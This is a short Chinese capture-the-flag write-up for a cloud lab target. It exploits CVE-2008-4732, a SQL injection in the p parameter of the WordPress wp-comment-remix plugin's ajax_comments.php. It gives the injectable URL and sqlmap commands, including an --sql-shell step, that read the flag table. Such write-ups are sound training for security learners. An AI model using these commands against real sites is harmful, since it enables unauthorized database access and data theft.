春秋云境CVE-2008-4732

1.阅读靶场介绍

这里可以得到的就是这个ajax_comments.php

这个插件的p参数存在sql注入

简单来说就是

ajax_comments.php?p=xxx

这样的形式可以sql注入

2.启动靶场

得到如下所示的页面

3.poc

构造如下url

https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1

我们可以得到如下页面

接下来就是复制url

然后启动sqlmap

执行一下语句

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch

如下所示

一直直到它查出来存在sql注入时

如下所示

我们可以再执行如下命令

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch --sql-shell

如下所示

最后就是去查询flag

执行下述命令

select * from flag

到此我们就完成夺旗了

文章也接近尾声了

感谢各位花费宝贵的时间来观看我的文章

相关推荐
IT大白鼠7 分钟前
Linux系统安全及应用:技术配置与检测实战
linux·运维·系统安全
技术不好的崎鸣同学12 分钟前
WEB安全之XSS专题:前沿案例与实战分析
安全·web安全·xss
淼淼爱喝水35 分钟前
DVWA和Pikachu命令注入漏洞检测实验
安全·web安全·php·pikachu·dvwa
应用市场40 分钟前
Android Verified Boot 2.0 安全启动原理详解
android·安全
jixunwulian1 小时前
AI边缘智能网关工业安全领域的边缘智能预警方案应用
网络·人工智能·安全
静小谢1 小时前
sql笔记
spring boot·笔记·sql·mybatis
TechWayfarer1 小时前
网络安全视角:利用IP定位API接口识别机房与基站流量(合规风控篇)
开发语言·网络·数据库·python·安全·网络安全
SL-staff1 小时前
企业文档私有化部署的安全设计:加密存储、传输与审计日志
安全·私有化部署·数据安全·加密·安全架构·合规·企业文档
念越2 小时前
HTTPS 安全内核:对称与非对称加密的博弈,数字证书一战定局
java·网络·网络协议·安全·https
sleepcattt2 小时前
Spring-全面详解(学习总结)
数据库·sql·spring·spring事务·spring详解